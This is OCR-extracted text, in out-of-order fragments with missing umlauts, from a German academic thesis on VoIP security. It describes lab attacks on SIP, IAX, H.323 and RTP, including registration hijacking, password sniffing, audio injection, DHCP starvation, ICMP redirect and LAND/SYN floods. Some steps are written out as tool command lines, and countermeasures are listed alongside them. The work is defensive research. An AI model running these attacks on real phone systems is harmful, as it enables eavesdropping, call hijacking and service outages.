219. ffes ist eine Zusammenfassung verf gbar welche einen berblick betreffend eingesetztem Angriffs Tool Angriffsziel Auswirkung und Gegenmassnahmen geben soll Zus tzlich wird der Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 12 eo Berner Fachhochschule tem Technik und Informatik Software Schule Schweiz Angriff gem ss der bekannten Sicherheitsdefinitionen Integrit t Vertraulichkeit und Verf gbarkeit klassifiziert wobei auch der Schweregrad der Angriffsausf hrung definiert wird Nach dieser Zusammenfassung folgen jeweils mit den Kapiteln Technik und Funktionsweise sowie Ausgangssituation Ablauf und Bedingungen f r Angriff weitere Informationen zum Angriff Abschliessend darauf folgt das Unter Kapitel Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Als Raster f r den Schweregrad der Installation und Anwendung des jeweiligen Angriffs Tools sowie der erforderlichen Vorkenntnisse f r den Angriff gelten folgende Angaben Schweregrad Installation Anwendung N tige Vorkenntnisse f r Angriff 1 leicht selbsterkl rend leicht selbsterkl rend keine 2 leicht leicht wenig 3 normal normal Grundkenntnisse 4 knifflig knifflig Erweiterte Grundkenntnisse 3 schwierig schwierig gute Kenntnisse Anwenderkenntnisse 6 sehr schwierig sehr schwierig Fachspezialist Als Raster f r das Gefahrenpotential des jeweiligen Angriffs
220. ffszieles parallel auf dem Terminal des Angreifers rufen lassen Alle ankommenden Anrufe in der Firma auf ein einzigen User Agent umleiten Schutz gegen Angriff Analyse Zeit des automatischen Registrierungs Intervalls verk rzen Terminals haben meist einen Standardwert von 3600 Sekunden Das heisst das gehijackte Terminal meldet sich nach Ablauf dieser Zeit wieder automatisch am Registrar an Bis dahin bleibt das Terminal jeweils ankommend unerreichbar Authentifizierung der User Agent einschalten und mit sicheren Passw rtern arbeiten Somit ist ein hijacken nur m glich wenn der Angreifer im Besitze des Passwortes ist TCP f r die SIP Verbindungen verwenden Somit ist eine verbindungsorientierte Kommunikation zum SIP Proxy gegeben in welcher die Pakete durch Sequenznummern gekennzeichnet sind Ein Hijacken einer solchen Verbindung ist um ein vielfaches erschwerter als eine mit UDP Siehe Massnahmen Authentisierung von SIP Nachrichten Kapitel 8 1 2 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Siehe Massnahmen TLS und SIP Kapitel 8 1 4 Siehe Massnahmen IPSec und SIP Kapitel 8 1 5 Kommentar SiVuS ist ein m chtiges Tool das verschiedenste Scanner Funktionen f r verschiedene Protokolle wie SIP MGCP H 323 und RTP beinhaltet Ebenfalls bietet das Tool die M glichkeit SIP Meldungen zu generieren und diese gegen ein Angriffsziel einzusetzen sowie deren Antwortpakete zu protokollieren Diplomarbeit V
221. ft der IETF der eine L sung fiir die NAT und Firewallproblematik im Zusammenhang mit VoIP bietet Ein MIDCOM System besteht aus einer Middlebox und einem Serversystem dass die Middlebox steuert bzw konfiguriert Der Steuerungsserver ist ein VolP Server H 323 Gatekeeper SIP Proxy der sich im Signalisierungspfad befindet und den Austausch der SDP Daten verfolgt und anhand dieser Daten Uber das MIDCOM Protokoll die Middlebox NAT Gateway Firewall steuert die die NAT Bindungen in die NAT Tabelle eintr gt und die entsprechenden Ports ffnet MIKEY standardisiert in RFC3830 von der Arbeitsgruppe IETF MSEC beschreibt das Schl sselmanagement f r die Echtzeit Multimedia Kommunikation und erm glicht den Austausch von Schl sseln genannt Transport Encryption Key TEK und Transport Generation Key TGK sowie weiteren Sicherheitsparametern Data Security Association zwischen den Teilnehmern 19 02 2009 Berner Fachhochschule Technik und Informatik Software Schule Schweiz http de wikipedia org wiki IPSec http www bsi bund de literat studie n VolP index htm http www bsi bund de literat studie n VolP index htm http www bsi bund de literat studie n VolP index htm http de wikipedia org wiki MAC Spoofing http de wikipedia org wiki MAC Adresse http de wikipedia org wiki MD5 http de wikipedia org wiki MGCP http www bsi bund de literat studie n VolP index htm http www bsi bund
222. ftools 3 1 Hardware Zur Erf llung der Aufgaben sind folgende HW Ressourcen n tig Anzahl Hardware Mindestanforderung 2 PC inklusive Monitor 512 MB RAM 60 GB HD WIN XP Ethernetinterface 2 x USB 1x RS232 2 PBX Ascotel Intelligate 2045 SW 1 7 68 VOIP amp SIP Lizenzen gel st DSP Karten integriert AIP 6400 Karten f r H 323 best ckt Jel IP Terminal 60 70 80 SW 2 6 24 Jel SIP Terminal 51 53 57 SW 2 3 0 8 1 IP Terminal Office 35 H 323 1 IP Terminal Tiptel Innova 200 H 323 1 Softphone 2380 IP SW 1 0 0 0 2 Switch Zyxel Managed 1 Netzwerk HUB Div Netzwerkkabel Kleinmaterial 3 2 Software und Tools Folgende Tools stehen bereits fiir Analyse und Angriffe auf die VOIP Verbindungen zur Verf gung Diese Liste ist nicht abschliessend und soll daher nicht als Einschr nkung der einzusetzenden Mittel gelten W hrend der Diplomarbeit sollen weitere n tzliche Tools evaluiert und eingesetzt werden Tool Einsatz Asteroid Denial of Service Tool SIP BYE teardown Sendet SIP BYE Nachrichten und beendet somit Verbindungen Cain amp Abel Sehr m chtiges Tool im Bereich Traces Attacken und Logging Check Syn phone rebooter Sendet NOTIFY SIP Message und l sst dadurch Terminals rebooten H225regregject Unterbricht H 323 Verbindungen IAX Flooder Uberflutet IAX System mit IAX Paketen IAXAuthJack Snifft Registrierungspassw rter der PBX Asterisk IAXBrute Brutforce dictionary Attack Tool f r IAX Protokoll Nessus Netzw
223. funden siehe Kapitel 2 2 1 dass der Registrar hier zugleich auch SIP Proxy Server respektive SIP PBX die IP Adresse 10 1 1 101 hat Mit SIPSCAN wird nun versucht welche g ltigen User Accounts es berhaupt bei diesem Registrar gibt und ob sich diese bei der Anmeldung an diesen authentifizieren m ssen oder nicht Dies wird erreicht in dem SIPSCAN mit m glichen vordefinierten User Accounts Register Nachrichten an den Asterisk Proxy Server sendet Anhand dessen Antwort kann festgestellt werden ob es sich hierbei um g ltige oder ung ltige User Accounts handelt und ob diese sich beim Asterisk Proxy Server durch Authentifizierung registrieren m ssen 2 3 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Einen wichtigen Hinweis gibt es betreffend dem Feld Username Extensions File zu machen Im Installations Verzeichnis von SIPSCAN liegt auch die Datei users txt In dieser Datei m ssen alle die zu testenden User Accounts eingetragen werden Meist werden User Accounts identisch mit der Rufnummer der User Agents im 3 4 stelligen Bereich nummeriert und dies in einem Zahlenrange von 2 bis 6 z Bsp 2xx 3xx 5xx 4xxx OXXX Am einfachsten geht es wenn in einer Exceltabelle 3 fortlaufende User in Al A3 erstellt werden Diese 3 Eintr ge markieren und in A3 rechts unten auf das schwarze kleine Viereck klicken Es erscheint ein Zeichen dieses Zeichen mit gedriickter linker Maustaste gegen den unteren Bildschirmrand ziehen bi
224. fung der Sicherheit einzelner Rechner in Netzwerken sowie der Gesamtsicherheit des Netzwerks Mit Cain amp Abel Ettercap SiVus Zenmap und Wireshark wurden auch Angriff Tools respektive Netzwerkmonitoren eingesetzt welche sehr bekannt und gut dokumentiert sind Dabei stellten sich Cain amp Abel sowie Ettercap als multifunktionale Angriff Tools heraus von denn eine wirklich sehr grosse Gefahr f r das Angriffsziel ausgeht Zahlreiche dokumentierte Angriffe in dieser Diplomarbeit best tigen diese Aussage Da VOIP Systeme auf einem Shared Medium aufsetzen dem Daten Netzwerk wurden auch viele der Angriffe gegen die Netzwerk Infrastruktur und deren Sicherheit ausgef hrt Die Netzwerk Sicherheit bildet den Grundstein der VOIP Sicherheit welche nur so gut sein kann wie die auf der sie aufsetzt Die Angriffe auf die Signalisierungsprotokolle SIP H 323 und IAX haben aufgezeigt wie wichtig ein umfassendes Sicherheitskonzept und dessen Umsetzung ist Der dabei wohl wichtigste Faktor ist eine korrekt konfigurierte Firewall obschon Angriffe von innen nicht zu untersch tzen sind Ist der Angreifer einmal im internen Netzwerk wird es schwieriger sein seine Angriffe abzuwehren Die Protokolle k nnen nicht unendlich gesch tzt oder verschl sselt werden ohne dass dabei die grundlegende Funktionalit t oder Gespr chsqualit t leidet So m ssen zum Beispiel die SIP Proxy Server die Nachrichten lesen interpretieren und bearbeiten k nnen was eine Vers
225. g f r den Austausch sicherer Passw rter seitens der Hersteller Soft oder Hardphones fehlt 3 3 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer hat Wireshark gestartet h rt den Netzwerkverkehr mit und zeichnet diesen auf Im Wissen dass bei den meisten Soft oder Hardphones der Registrierungsintervall auf 3600 Sekunden per Default eingestellt ist braucht er nur auf die periodische Registrierung der einzelnen IAX Clients zu warten Damit der Angreifer die im Netzwerk ausgetauschten Nachrichten welche ber andere Switch Ports gehen empfangen kann muss die Bedingung gegeben sein in einem geswitchten Netzwerk Daten abhorchen zu k nnen Siehe Kapitel 1 4 Untenstehender Ausschnitt der Wireshark Aufzeichnung wie Benutzer 4131 sein Passwort 3ascotel in Klartext ber das Netzwerk sendet WW geschn ffelt tn 4131 pw 3a Eile Edit View Go Capture Analyze Statistics Help Filter v Expression Clear Apply No Time Source Destination Protocol Info 8 3 328705 a a Ta a ead 1071712101 IAX2 IAX source call 11341 11 3 444197 CompalIn_Ob ad 96 Broadcast ARP who has 10 1 1 1 Tell Type IAX 6 IAX subclass REGREQ 13 Information Element Username peer or user for authentication 4131 IE id Username peer or user for authentication 0x06 Length 4 Username peer or user for authentication 4131 Information Element when to refresh registration 300 IE id when to refresh regi
226. gel durch diese Angriffe gefunden werden und es der zeitliche Rahmen erlaubt sind L sungsvorschl ge auszuarbeiten welche zur Verbesserung der VOIP Sicherheit der PBX Ascotel Intelligate beitragen 2 4 Abgrenzung Ziel ist es nicht eine Hacker Anleitung f r Script Kiddies zu erstellen Jedoch sollen die get tigten Angriffe und die daraus resultierenden Ergebnisse inklusive der Protokoll Aufzeichnungen festgehalten und dokumentiert werden Die dazu verwendeten Tools sind zu benennen und der Diplomarbeit als Anhang in Form einer CD beizulegen F r den Leser des Diplomberichtes soll es dadurch m glich sein die get tigten und dokumentierten Ergebnisse respektive Angriffe selbst nachvollziehen zu k nnen Gefahren zu erkennen und die n tigen Gegenmassnahmen einzuleiten 2 5 Projekt Dokumentation S mtliche Protokollanalysen Angriffe und Resultate sind im Diplombericht ausf hrlich zu dokumentieren Ebenfalls ist jeweils dazu das aktuelle Setup der Testumgebung in Form eines Prinzipschemas zu belegen Am Ende des Projektes sind folgende Dokumentationen abzugeben Pflichtenheft Diplombericht mit Dokumentationsteilen zu Analyse Angriffe Tools CD mit den eingesetzten Angriffs und Analysetools sowie der aufgezeichneten Traces Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 215 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz 3 Einsatz Hardware Test Analyse und Angrif
227. gelten folgende Angaben Gefahrenpotential Gefahr f r Angriffsziel Sehr kleine Gefahr Angriff hat keine Auswirkungen Kleine Gefahr Angreifer kommt zu Infos momentane Auswirkung bleibt klein Gefahr Angreifer kann Angriff ausweiten und st rt den Betrieb Mittlere Gefahr vereinzelt keine Verf gbarkeit Integrit t oder Vertraulichkeit Grosse Gefahr keine Verf gbarkeit Integrit t und Vertraulichkeit Kostenfolgen Di Nn BR won m Sehr grosse Gefahr keine Verfiigbarkeit der ganzen Infrastruktur Kostenfolgen gross Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 13 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 1 3 _ Testumgebung Setup Untenstehend ist die Testumgebung abgebildet in welcher die Angriffe get tigt wurden Je nach Protokoll und Angriff musste die Testumgebung angepasst werden Zur bersichtlichkeit wurde pro Setup eine andere Farbe gew hlt IAX Client 4131 4155 SIP Ascotel TN Softphone Zoiper Asterisk Proxy Server SIP Phone Aastra 57i SIP Phone Aastra 53i SIP Soft Phone X Lite 10 1 1 101 10 1 1 129 10 1 1 121 10 1 1 151 User Agent 4129 User Agent 4111 User Agent 4119 User Agent 7129 User Agent 7111 H 323 4151 Softphone Ekiga g N a Y K Router Netopia 3347 I 10 1 1 1 the Switch 10 1 1 191 GA mR Gateway 10 1 1 2 Reserve H 323 Gnugk Gatekeeper eee 4155 Office 80IP N ngre
228. ger te erneuern von Zeit zu Zeit oder beim Aufstarten ihre Konfiguration Sind infolge des Angriffes keine freien IP Adressen mehr verf gbar k nnen sich die Endger te nicht mehr am Netzwerk anmelden und sind daher weder f r abgehende noch ankommende VOIP Verbindungen brauchbar Innert k rzester Zeit sind somit keine VOIP Endger te mehr am Netzwerk angemeldet und somit die gesamte Telefonieinfrastruktur nicht mehr erreichbar Rouge Server Sind durch den Angreifer erst mal alle IP Adressen abgegraben worden stellt dieser ein eigenes DHCP Server f higes Ger t zB Router oder DHCP Server ins Netzwerk Somit vergibt der Angreifer jetzt die Netzwerkkonfiguration an die per DHCP Discover anfragenden VOIP Terminals In dieser Netzwerkkonfiguration gibt der Angreifer eine falsche Gateway Adresse an damit s mtlicher Datenverkehr ber ihn l uft und er die Daten mittels Netzwerkmonitor aufzeichnen kann Schutz gegen Angriff Analyse Siehe Massnahmen DHCP Angriffe Kapitel 8 5 3 Siehe Massnahmen IDS Kapitel 8 5 15 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 168 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 6 10 2 Technik und Funktionsweise DHCP Dynamic Host Configuration Protocol erlaubt es den Hosts durch einen DHCP Server die Netzwerkkonfiguration zuzuweisen Dieser automatische Mechanismus ve
229. geschlossenen Endpoints Hard oder Softphones und den Gatekeepern zu erhalten wie es berhaupt m glich ist Die Enumeration steht meist an Anfang weiterer Angriffe welche jedoch erst mit den aus der Enumeration gewonnen Kenntnissen m glich sind Die H 323 Enumeration basiert auf dem Scannen bestimmter f r H 323 reservierte Ports Schutz gegen Angriff Analyse Eine wirksame Schutzmassnahme ist schwierig zu realisieren denn die Ports m ssen f r die korrekte Funktionalit t offen bleiben Einzige m gliche Massnahmen sind Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Siehe Massnahmen IDS Kapitel 8 5 15 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 105 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz 4 2 2 Technik und Funktionsweise Zum Suchen nach vorhandenen H 323 Endpoints und Gatekeepern wird ein Portscanner eingesetzt Dabei wird spezifisch nach den statischen fiir H 323 reservierten Ports im Netzwerk gesucht Folgende Ports sind fiir H 323 reserviert 1718 Gatekeeper discovery 1719 Gatekeeper RAS 1720 H 323 Call Setup 1731 Audio Control Findet der Portscanner ein solches offenes Port so wird vermutet dass es sich hierbei um eine n H 323 Applikation Gatekeeper handelt und das gefundene Angriffsziel wird aufgelistet Mit diesem Wissen kennt der Angreifer die IP Adressen und die offenen Ports potentieller H 323 A
230. gestellt In diesem Beispiel wird ein Registration Hijacking im authentifizierten Netzwerk ausgef hrt Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 58 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 2 8 2 Technik und Funktionsweise Um mit registrationhijacker einen gef lschten gespooften Register Request senden zu k nnen welcher zum Registration Hijacking f hrt m ssen zuerst mittels eines Netzwerkmonitors die Registrierungsdaten der potentiellen Angriffsziele aufgezeichnet respektive in Erfahrung gebracht werden Mit diesen ersnifften Registrations Daten kann dann im registrationhijacker ein gespoofter Register Request erstellt und abgesendet werden Je nach gew nschtem Angriff wird die zu sendende Nachricht anders parametrisiert Damit der Angreifer die ber das Netzwerk gesendeten Registrierungs Daten eines User Agents sniffen kann muss die Bedingung gegeben sein in einem geswitchten Netzwerk Daten abhorchen zu k nnen Siehe Kapitel 1 4 F r dieses Beispiel werden die gesnifften Daten des vorg ngigen Beispiels Kapitel 2 7 3 verwendet Da es sich diesmal um ein authentifiziertes Netzwerk handelt muss in dem gespooften Register Request auch das Passwort des Angriffziels bertragen werden Dieses Passwort wurde entweder als Klartextinformation oder MDS5 Hashwert mit den restlichen Daten zum voraus gesnifft Sollte das Passwort nur als MD5 Hashwert vorliegen mus
231. grad http www remote exploit org BackTrack_download html 1 leicht 6 schwer Das Tool ist ebenfalls in BackTrack3 enthalten i Hinweise zu Installation Verf gbarkeit Installation Tool 4 Anwendung Tool 4 Das Tool ist in BackTrack3 enthalten Erforderliche Vorkenntnisse 4 Installationsanleitung zu BackTrack3 siehe Kapitel 1 5 2 Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 6 Ziel Angriff Analyse Der Angreifer sendet ein TCP Paket an das Angriffsziel bei dem sowohl die Source IP Adresse und das Source Port identisch mit der Ziel IP Adresse und dem Ziel Port sind Dabei wird die IP Adresse des Angriffszieles verwendet Das Angriffsziel sendet somit andauernd Pakete an sich selbst Die Folge davon ist 100 Prozessorauslastung bis hin zum Absturz des Rechners Ein somit angegriffener VOIP Server ist innert k rzester Zeit ausser Funktion und dadurch die ganze VOIP Infrastruktur ausser Betrieb gesetzt DoS Denial of Service Schutz gegen Angriff Analyse Siehe Massnahmen LAND Flood Kapitel 8 5 13 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 176 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 6 12 2 Technik und Funktionsweise Der Angreifer sendet ein TCP Paket an das Angriffsziel bei dem sowohl die Source IP Ad
232. gramm red Es soll eine Redirect Nachricht erzeugt werden S 10 1 1 1 Gespoofte Source Adresse des Absenders dieser Nachricht gw 10 1 1 240 Default Gateway der neu verwendet werden soll dest 0 0 0 0 Route Destination Adresse gt Optional bei ICMP Redirect x host ICMP Code zum Senden prot tcp Es soll eine TCP Nachricht gesendet werden psrc 100 Source Port der ICMP Nachricht pdst 90 Ziel Port der ICMP Nachricht Port beim Angriffsziel 10 1 1 101 Angriffsziel Usage SING RnvqQOGBU c count T wait p pattern s garbagesize t ttl TOS tos F bytes i interface S spoof addr L file MAC hw_addr type host Type echo Echo Request default reply Echo Reply du tion Unreach info Information Request mask d Mask Request param Parameter Problem rta Router Advertisement rts Router Solicitation red Redirect sq Source Quench tstamp Timestamp tx Time Exceeded h This help screen V Program version v Verbose mode on Host host Sending to a host routerl router2 router3 host Sending with Strict Source Routing router1 router2 router3 host Sending with Loose Source Routing Please see the man page for a full list of options and many examples Send your bugs amp suggestions to Alfredo Andres Slay lt aandres s21sec com gt sing red S 10 1 1 1 gw 10 1 1 241 dest 0 0 0 0 x host prot tcp psrc 100 pdst 90 10 1 1 101 SINGing to 10 1 1 101 10 1 1 101 36 data bytes Diplomarbeit VOIP
233. griffes schafft es das Angriffsziel nicht mehr die SYN Pakete zu beantworten von 10 1 1 101 aus werden keine Pakete mehr ins Netzwerk gesendet Kurze Zeit sp ter ist der Asterisk Proxy Server nicht mehr erreichbar ist blockiert und verrichtet keine Dienste mehr Der Angreifer konnte den DoS Angriff Denial of Service mit Erfolg ausf hren und hat sein Ziel erreicht w TRace101 pcap Wireshark File Edit View Go Capture Analyze Statistics Help Eilter v Expression Clear Apply No Time Source Destination Protocol Info 6 11 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Mit dem Flooden k nnen einzelne IP Telefone oder der VOIP Server selbst angegriffen werden Die enorm grosse Anzahl der zum Angriffsziel gesendeten SYN Pakete werden dazu f hren dass das Angriffsziel seinen normalen Aufgaben nicht mehr nachkommen kann oder dies nur mit sehr grosser Verz gerung Verwerfen der anstehenden RTP Pakete bis hin zum Systemabsturz sind die Folgen dieses Angriffes Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 175 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 6 12 1 DoS LAND Flood Integritat sears ARSRRRRALSELLLLEE Vertraulichkeit Eingesetztes Tool Verf gbarkeit x hping3 Downloadlink Quelle des Tools Schwere
234. gssituation Ablauf und Bedingungen f r Angriff 106 4 2 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 107 4 3 1 Password Retrieval H 323 against MD5 108 4 3 2 Technik und Funktionsweise 109 4 3 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 109 4 3 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 109 4 4 1 Denial of Service H 323 Registration Reject 110 4 4 2 Technik und Funktionsweise 111 4 4 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 111 4 4 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 112 4 5 Bemerkungen zu den H 323 Angriffen 112 5 RTP Real time Transport Protocol Einf hrung 113 5 1 1 RTP Header 113 5 1 2 RTCP Real time ControlTransport Protocol Einf hrung 114 5 2 1 RTP Sniffing 115 5 2 2 Technik und Funktionsweise 116 5 2 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 116 5 2 4 RTP sniffing mit Cain amp Abel Version 4 9 24 116 5 2 5 RIP sniffing mit Wireshark Version 1 05 118 5 2 6 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 120 5 3 1 RTP insert sound 121 5 3 2 Technik und Funktionsweise 122 5 3 3 Ausgangssituation Ablauf und Bedingungen f r Angriff 122 5 3 4 __ Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus 124 5 4 1 RTP Flooding 125 5 4 2 Technik und Funktionsweise 126 5 4 3 Ausgangssit
235. h teilweise gar nicht erst installieren Daher ist eine Deaktivierung des Virenscanners auf dem PC des Attackers empfohlen oder aber dem Virenscanner kann gesagt werden dass er Cain amp Abel ignorieren soll Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 44 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 2 5 2 Technik und Funktionsweise Ein User Agent der sich beim SIP Proxy Server registrieren will sendet einen Registration Request an diesen Muss er sich gem ss seinem Account der im Proxy Server eingerichtet ist bei der Registrierung via Challenge Response Verfahren authentifizieren so sendet ihm der SIP Proxy Server einen Nonce zu Mit diesem Nonce dem Realm dem Benutzernamen und dem Passwort bildet der User Agent dann einen MD5 Hashwert welchen er zur ck an den Proxy Server sendet Dabei wird alles in Klartext ber das Netzwerk bertragen ausser das MD5 gehashte Passwort Da dies die einzige Unbekannte ist l sst sich das Passwort mittels Dictionary Attacke ausfindig machen Bedingung dabei ist dass es sich um ein einfaches und simples Passwort handeln muss Eine Registrierung wird immer beim Starten eines Terminals oder nach einer im Terminal fest eingegeben Zeit ausgef hrt Diese Zeit ist in den meisten F llen 3600 Sekunden per default eingestellt Diese periodische Registrierung dient zur Gew hrleistung der Erreichbarkeit des Terminals
236. hend aufgef hrt Sehr oft werden Switchports so konfiguriert dass jeweils nur genau eine vordefinierte MAC Adresse Zugang zu diesem Port hat Port Security Dies soll verhindern dass kein Unbefugter einen eigenen PC an das Netzwerk anschliessen kann und erh ht somit die Sicherheit der gesamten IT Infrastruktur Mittels eines Netzwerkmonitors ist es jedoch einfach herauszufinden an welchem Port welche MAC Adresse bers Netzwerk kommuniziert Ist diese MAC Adresse einmal durch den Angreifer ausfindig gemacht worden kann er genau gleich wie im vorherigen Beispiel mittels MAC MakeUP seine eigene MAC Adresse mit der ersnifften berschreiben und schon ist ihm an diesem bestimmten Port Zugang zum Netzwerk gew hrt Untenstehendes Bild zeigt wie der PC mit der MAC Adresse 00 14 22 f0 22 43 nur genau an Port 10 Zugang zum Netzwerk erh lt je Mozna riretox E E ad Datei Bearbeiten Ansicht Chronik Lesezeichen Extras Hilfe dont fey http 10 1 1 191 pages index htm wy DAEMON Sere P A Meistbesuchte Seiten Erste Schritte A Aktuelle Nachrichten http www aastra ch P address 10 1 1 19 jeg 1 09 itv summary ee a Security Network Access zi Configuration Apply New Settings Edit Allowed MAC address List Delete Destination Address Fiter_ System fi Switch Security Settings SNMP Spanning Tree Security Status Enable Port S
237. hgesetzt das Telefonieren ber Computer Netzwerke geh rt mittlerweile schon fast zur Selbstverst ndlichkeit Wo fr her die Kommunikation mit ISDN oder analoger Technik ber getrennte und separate Leitungen statt gefunden hat wird heute f r VOIP das gleiche Medium genutzt welches auch f r die Computer und Internetkommunikation eingesetzt wird Doch wie sicher ist eigentlich VOIP im Umfeld dieses shared Mediums Wie sicher sind die heute dazu eingesetzten Protokolle Kann der Anwender sicher sein dass kein Unbefugter mith rt Die Vielfalt der eingesetzten Protokolle mit VOIP macht es auch nicht leichter den berblick wahren zu k nnen Mittels Analysen und gezielten Angriffen soll VOIP bez glich Integrit t Vertraulichkeit und Verf gbarkeit untersucht und die daraus gewonnenen Erkenntnisse und Gegenmassnahmen betreffend der Gefahren aufgezeigt werden 1 2 Zweck des Pflichtenheftes Die zu erf llenden Anforderungen an die Diplomarbeit und dem daraus resultierenden Diplombericht werden im Pflichtenheft definiert und festgelegt Die aufgef hrten Ziele wurden anhand der Sitzungen mit dem Betreuer und Experten definiert und schriftlich festgehalten 1 3 Zielgruppe Die Diplomarbeit inklusive aller Berichte und aufgezeichneter Logdateien richtet sich an Zielpersonen welche sich bereits mit dem Thema VOIP auseinander gesetzt haben Es wird daher auf ein Einf hrungskapitel bez glich VOIP Telefonie verzichtet und vorausgesetzt
238. hhochschule iu Technik und Informatik Software Schule Schweiz http www hackingvoip com sec_tools html http sox sourceforge net Hinweise zu Installation Verf gbarkeit Die einzuschleusenden Audiodaten m ssen zuerst in ein bestimmtes Format gebracht werden Dazu ist sox exe zu verwenden welches unter obigem Downloadlink herunter geladen werden kann Benennung Angriffe Analyse Angriff Analyse gegen 5 3 1 RTP insert sound Integrit t he RE Vertraulichkeit Eingesetztes Tool Verf gbarkeit rtpmixsound Downloadlink Quelle des Tools Schweregrad 1 leicht 6 schwer Installation Tool Anwendung Tool Erforderliche Vorkenntnisse Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel Wert x X X Ziel Angriff Analyse Aufenthaltsort betrifft Dieser Angriff zielt auf die Integrit t der RTP Sprachpakete ab Dabei h rt der Angreifer das Netzwerk nach aktiven Gespr chsverbindungen ab und schleust eigene RTP Sprachpakete in diese Verbindung ein Die einzuschleusenden Sprachpakete werden aus einem zuvor bestimmten WAV File generiert So k nnen zum Beispiel Hintergrundger usche wie Bahn Restaurant Discothek oder das laute Lachen einer Frau in die angegriffene Gespr chsverbindung eingeschleust werden Die betroffenen Kommunikationspartner werden verunsichert glauben der and
239. hten empfangen kann muss die Bedingung gegeben sein in einem geswitchten Netzwerk Daten abhorchen zu k nnen Siehe Kapitel 1 4 Im Terminalfenster von BackTrack3 werden das Tool und der Angriff mit folgenden Argumenten gestartet redirectpoison ethO 10 1 1 129 5060 lt sip 4111 10 1 1 121 gt Die Argumente im Einzelnen stehen wie folgt f r redirectpoison Aufruf Tool ethO Besagt tiber welche Schnittestelle des PC s die Daten gesendet werden sollen 10 1 1 129 Es soll auf INVITE Nachrichten von 10 1 1 129 reagiert werden 5060 Port von 10 1 1 129 lt sip 4111 10 1 1 121 gt Wird an 10 1 1 129 gesendet besagt wo der gew nschte User Agent neu ist V Voransicht Tool erzeugt mehr Logs KKK bt redirectpoison eth0 10 1 1 129 5060 lt sip 4111 10 1 1 121 gt v redirectpoison Version 1 1 October 16 2006 target IPv4 addr port 10 1 1 129 5060 redirect response contact info lt sip 4111 10 1 1 121 gt pre poisoning assessment logix is dependent upon finding this URI user part in the Request URI or To URI of target SIP requests 4111 Verbose mode __REDIRECTPOISON_LIBNET_PROTOCOL_LAYER 3 Will inject spoofed audio at IP layer pcap filter installed for live sip signaling sniffing src host 10 1 1 129 and udp sre port 5060 pcap live ethO interface is blocking Process priority was 0 Process Priority set to 20 i e highest priority exiting closing live pcap sip interface Diplomarbeit VOIP Sec
240. hung nennt man in der Informationstechnik verschiedene T uschungsversuche in Computernetzwerken zur Verschleierung der eigenen Identit t Personen werden in diesem Zusammenhang auch gelegentlich als Spoofer bezeichnet Bei dem Secure Real Time Transport Protocol SRTP handelt es sich um die verschl sselte Variante des Real Time Transport Protocol RTP Das Protokoll wurde im M rz 2004 von der IETF im RFC 3711 vorgestellt Dieses Feld dient zur Identifikation der Synchronisationsquelle Der Wert wird zuf llig ermittelt damit nicht zwei Quellen innerhalb der RTP Session die gleiche Identifikationsnummer besitzen Angriffs Tool mit welchem sich die IP und die MAC Adresse spoofen l sst Das Spanning Tree Protocol STP baut einen Spannbaum zur Vermeidung redundanter Netzpfade Schleifen im LAN speziell in geswitchten Umgebungen auf Die Implementierung wurde aufbauend auf einem Spannbaum Algorithmus von Radia Perlman entwickelt und ist in der IEEE Norm 802 1D standardisiert Mittlerweile wurde das klassische STP durch RSTP nach IEEE 802 1w ersetzt Ein Switch engl Schalter auch Weiche ist eine Netzwerk Komponente zur Verbindung mehrerer Computer bzw Netz Segmente in einem lokalen Netzwerk LAN Da Switches den Netzwerkverkehr analysieren und logische Entscheidungen treffen werden sie auch als intelligente Hubs bezeichnet Die Funktionsweise eines Switches ist der einer Bridge sehr hnlich daher wurde anfangs auch
